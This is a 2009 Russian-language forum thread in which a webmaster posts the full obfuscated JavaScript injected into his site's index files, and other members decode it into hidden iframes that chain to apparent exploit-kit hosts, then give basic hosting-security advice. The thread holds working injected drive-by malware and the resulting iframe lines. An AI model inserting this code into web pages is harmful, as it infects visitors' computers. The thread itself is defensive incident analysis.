Внедрение в index.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Внедрение в index. - 2009-02-03 23:12:28.396666
|
|
|
xals
Сообщений: 12
Оценки: 0
Присоединился: 2009-02-03 22:45:34.893333
|
Вчера хотел проверить скрипт на своем web-сайте, открыл браузер, набрал адрес и на тебе - доступ к странице заблокирован антивирусов (AVK), сразу понял что это дело рук frame (подгрузка вируса на комп).
Пришлось залезать через ftp на хост, скинул на комп тот самый индексный файл, мое опасение насчет frame полностью оправдалось: внутри index.html был вбит зашифрованый код после атрибута <bоdу>, как ни странно но этот фрэйм был только в индексах (php, html), после удаления всех файлов на хосте он пропал :) (конечно перед этим я зделал бекап)…
Но для себя я оставил один зараженный этим кодом файлик на компе - ссори за большую публикацию всего кода но, хочу чтобы кто нибудь из участников форума его расшифровал… и если сможете то объясните что к чему…
прошу на обозрение \
<!-- ad --><sсriрt/> window['eqvqaPl%'.replace(/[Z%qPb]/g, '')](window['eqvqaPl%'.replace(/[Z%qPb]/g, '')]('u3nge9s3cgagpoeo'.replace(/[3o9\:g]/g, ''))('%66%75%6e%63%74%69%6f%6e%20%41%49%48%28%50%49%49%41%29%7b%66%75%6e%63%74%69%6f%6e%20%48%41%70%41%41%6c%28%48%41%49%29%7b%65%76%61%6c%28%22%76%61%72%20%41%68%68%61%3d%30%3b%22%29%3b%76%61%72%20%41%4c%41%70%41%4c%3d%48%41%49%2e%6c%65%6e%67%74%68%3b%65%76%61%6c%28%22%76%61%72%20%50%4c%50%54%54%48%68%44%3d%30%3b%22%29%3b%77%68%69%6c%65%28%50%4c%50%54%54%48%68%44%3c%41%4c%41%70%41%4c%29%7b%41%68%68%61%2b%3d%50%50%50%61%28%48%41%49%2c%50%4c%50%54%54%48%68%44%29%2a%41%4c%41%70%41%4c%3b%50%4c%50%54%54%48%68%44%2b%2b%3b%7d%72%65%74%75%72%6e%20%28%41%68%68%61%2b%27%27%29%3b%7d%66%75%6e%63%74%69%6f%6e%20%50%50%50%61%28%4c%61%41%49%61%2c%50%4c%4c%41%61%29%7b%72%65%74%75%72%6e%20%4c%61%41%49%61%2e%63%68%61%72%43%6f%64%65%41%74%28%50%4c%4c%41%61%29%3b%7d%20%20%20%74%72%79%20%7b%76%61%72%20%4c%68%6c%68%47%3d%65%76%61%6c%28%27%61%48%72%31%67%70%75%5d%6d%70%65%70%6e%31%74%53%73%53%2e%53%63%53%61%5d%6c%70%6c%53%65%53%65%53%27%2e%72%65%70%6c%61%63%65%28%2f%5b%48%5c%5d%31%70%53%5d%2f%67%2c%20%27%27%29%29%2c%41%4c%48%41%54%61%61%3d%27%27%3b%76%61%72%20%50%50%41%70%3d%30%2c%48%61%61%4c%61%3d%30%2c%50%6c%4c%3d%28%6e%65%77%20%53%74%72%69%6e%67%28%4c%68%6c%68%47%29%29%2e%72%65%70%6c%61%63%65%28%2f%5b%5e%40%61%2d%7a%30%2d%39%41%2d%5a%5f%2e%2c%2d%5d%2f%67%2c%27%27%29%3b%76%61%72%20%41%61%41%54%6c%68%3d%48%41%70%41%41%6c%28%50%6c%4c%29%3b%65%76%61%6c%28%22%50%49%49%41%3d%75%6e%65%73%63%61%70%65%28%50%49%49%41%29%3b%22%29%3b%66%6f%72%28%76%61%72%20%41%50%68%3d%30%3b%20%41%50%68%20%3c%20%28%50%49%49%41%2e%6c%65%6e%67%74%68%29%3b%20%41%50%68%2b%2b%29%7b%76%61%72%20%41%49%47%61%6c%70%3d%50%50%50%61%28%50%6c%4c%2c%50%50%41%70%29%5e%50%50%50%61%28%41%61%41%54%6c%68%2c%48%61%61%4c%61%29%3b%76%61%72%20%41%4c%6c%49%61%3d%50%50%50%61%28%50%49%49%41%2c%41%50%68%29%3b%50%50%41%70%2b%2b%3b%48%61%61%4c%61%2b%2b%3b%69%66%28%48%61%61%4c%61%3e%41%61%41%54%6c%68%2e%6c%65%6e%67%74%68%29%48%61%61%4c%61%3d%30%3b%69%66%28%50%50%41%70%3e%50%6c%4c%2e%6c%65%6e%67%74%68%29%50%50%41%70%3d%30%3b%41%4c%48%41%54%61%61%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%41%4c%6c%49%61%5e%41%49%47%61%6c%70%29%20%2b%20%27%27%3b%7d%65%76%61%6c%28%41%4c%48%41%54%61%61%29%3b%20%72%65%74%75%72%6e%20%41%4c%48%41%54%61%61%3d%6e%75%6c%6c%3b%7d%63%61%74%63%68%28%65%29%7b%7d%7d%41%49%48%28%27%25%33%32%25%33%38%25%33%36%25%33%30%25%33%38%25%33%37%25%33%37%25%33%35%25%36%31%25%33%37%25%33%39%25%30%61%25%32%64%25%35%39%25%31%66%25%37%38%25%36%30%25%31%35%25%32%35%25%33%65%25%32%36%25%37%66%25%32%64%25%30%39%25%31%37%25%33%37%25%36%31%25%31%63%25%36%39%25%31%61%25%31%65%25%31%32%25%32%37%25%32%63%25%33%31%25%30%32%25%33%30%25%37%37%25%32%37%25%30%33%25%33%35%25%33%65%25%32%32%25%36%30%25%33%33%25%33%66%25%32%66%25%31%61%25%31%39%25%31%37%25%33%33%25%35%65%25%35%65%25%32%31%25%31%35%25%30%33%25%37%39%25%33%31%25%33%38%25%37%65%25%37%39%25%37%61%25%34%38%25%33%38%25%36%30%25%32%34%25%32%65%25%32%64%25%36%62%25%36%32%25%30%64%25%33%38%25%31%36%25%31%63%25%35%38%25%35%37%25%37%66%25%31%66%25%36%38%25%33%31%25%30%33%25%32%65%25%32%30%25%37%64%25%30%33%25%31%61%25%34%38%25%30%30%25%30%65%25%33%63%25%32%65%25%31%33%25%31%39%25%35%32%25%31%31%25%33%33%25%31%62%25%31%35%25%36%36%25%36%31%25%37%30%25%33%38%25%34%65%25%31%62%25%30%32%25%32%32%25%33%63%25%33%35%25%30%66%25%36%36%25%30%66%25%31%65%25%31%64%25%31%37%25%30%36%25%35%35%25%34%66%25%30%31%25%31%30%25%31%65%25%30%35%25%32%30%25%35%31%25%35%37%25%34%35%25%37%63%25%34%62%25%35%37%25%34%32%25%31%37%25%37%65%25%30%30%25%32%30%25%32%34%25%33%35%25%33%33%25%33%65%25%32%61%25%31%38%25%33%32%25%32%61%25%32%32%25%33%36%25%35%64%25%37%62%25%33%64%25%33%30%25%33%38%25%33%61%25%33%63%25%30%35%25%30%61%25%32%32%25%33%37%25%31%31%25%32%35%25%35%36%25%35%64%25%37%36%25%32%62%25%34%63%25%37%37%25%35%65%25%31%36%25%37%39%25%33%31%25%33%38%25%33%37%25%30%33%25%33%33%25%31%61%25%30%63%25%33%30%25%31%35%25%30%63%25%32%64%25%37%63%25%37%63%25%37%61%25%30%39%25%32%35%25%31%32%25%33%65%25%33%63%25%32%39%25%35%31%25%36%66%25%34%35%25%37%63%25%35%37%25%34%32%25%37%37%25%32%30%25%32%35%25%32%64%25%33%34%25%33%39%25%31%37%25%31%30%25%32%34%25%37%34%25%33%61%25%31%30%25%33%36%25%33%38%25%37%61%25%30%64%25%32%33%25%30%30%25%32%31%25%36%66%25%33%62%25%30%34%25%32%61%25%33%31%25%31%63%25%33%33%25%36%30%25%33%37%25%32%38%25%37%37%25%34%34%25%33%39%25%30%35%25%34%66%25%31%35%25%33%38%25%30%64%25%37%39%25%33%31%25%36%65%25%32%30%25%31%35%25%30%30%25%31%35%25%30%39%25%30%63%25%37%33%25%32%66%25%33%64%25%33%32%25%32%64%25%34%39%25%33%37%25%32%38%25%31%30%25%36%32%25%33%63%25%30%64%25%33%66%25%37%37%25%30%63%25%35%62%25%35%64%25%30%35%25%33%64%25%32%35%25%33%61%25%30%32%25%36%62%25%34%61%25%36%62%25%30%31%25%34%66%25%34%61%25%33%35%25%32%62%25%33%62%25%34%66%25%35%31%25%36%33%25%35%64%25%36%63%25%37%64%25%36%39%25%34%37%25%31%37%25%33%30%25%30%32%25%30%33%25%36%37%25%35%35%25%36%64%25%37%31%27%29%3b'));</sсriрt><!-- /ad -->
|
|
|
|
|
RE: Внедрение в index. - 2009-02-03 23:34:40.663333
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
<iframe width="0" height="0" frameborder="0" src="http://loskut.cn/cotton.html">
|
|
|
|
|
RE: Внедрение в index. - 2009-02-03 23:42:10.056666
|
|
|
xals
Сообщений: 12
Оценки: 0
Присоединился: 2009-02-03 22:45:34.893333
|
Большое спасибо за расшифровку кода ! ;)
я предполагаю что его могли занести двумя способами - или сервер был взломан или проникновение произошло
через брешь в wordpress.
|
|
|
|
|
RE: Внедрение в index. - 2009-02-03 23:44:59.943333
|
|
|
oRb
Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
|
Скрипт вставляет следующий ифрейм
<iframe src="http://loskut.cn/cotton.html" width="0" frameborder="0" height="0"/> В нем еще скрипт, который создает еще фреймы:
<iframe id="178d4bd30faa8380e56e11609375cb83" name="bf5e26cf85f7687883c4267b6f4df345" width=1 height=1 frameborder=0 src="http://loskut.cn/western.html"></iframe><iframe id="14568963a2046a9d1ae83ea27e609694" name="d24a560cc0e60146a28536df37f28ee8" width=1 height=1 frameborder=0 src="http://pelingers.ru/fire/index.php"></iframe> В http://loskut.cn/western.html еще фрейм)
<iframe id="b5b711d554d6340aa026fac038f56b2e" name="fbff1b5af39a51e9ca317d9b36a6286d" width=1 height=1 frameborder=0 src="http://papampam.net/in.cgi?pipka3"></iframe> По ссылке http://papampam.net/in.cgi?pipka3 редирект на http://vienmoreter.com/pages.html
В нем еще 2 ферйма
<iframe frameborder="off" src="http://vienmoreter.com/cache/index.php" width=1 height=1 ></iframe>
<iframe frameborder="off" src="http://vienmoreter.com/kebab/info.php" width=1 height=1 ></iframe> А в них уже пусто) Возможно стоит какая-то защита, чтоб сплойты не стырили.
Дальше ковыряться уже лень.
|
|
|
|
|
RE: Внедрение в index. - 2009-02-03 23:59:51.890000
|
|
|
xals
Сообщений: 12
Оценки: 0
Присоединился: 2009-02-03 22:45:34.893333
|
quote:
Почитайте здесь - http://forum.xakep.ru/m_1398926/tm.htm
спасибо за инфу
quote:
А в них уже пусто) Возможно стоит какая-то защита, чтоб сплойты не стырили.
ну думал что так все может быть запутано с параметров frame, видимо чтобы смести все свои следы
кстати если взлом через FTP был то как всего лучше права выставить на файлы и каталоги с файлами, чтобы проникший не смог их править и исполнять
|
|
|
|
|
RE: Внедрение в index. - 2009-02-04 00:05:07.583333
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
quote:
кстати если взлом через FTP Если взлом через ФТП то никакие права не помогут.
|
|
|
|
|
RE: Внедрение в index. - 2009-02-04 00:41:55.563333
|
|
|
Cep}|{
Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
|
Ставить права на запись только на те файлы\папки, запись в которые действительно требуется сайту. Safe Mode держать выключенным.
Пароли от ФТП держать на компе со свежим антивирусом, не запускать что попало, не пихать левые флешки (и свою не пихать куда попало), и не входить на ФТП на каких попало компах.
Ну и не допустить:
quote:
проникновение на хост через тоже самый shell
|
|
|
|
|
RE: Внедрение в index. - 2009-02-04 00:58:26.623333
|
|
|
xals
Сообщений: 12
Оценки: 0
Присоединился: 2009-02-03 22:45:34.893333
|
обязательно учту на будущее :)
|
|
|
|
|
|
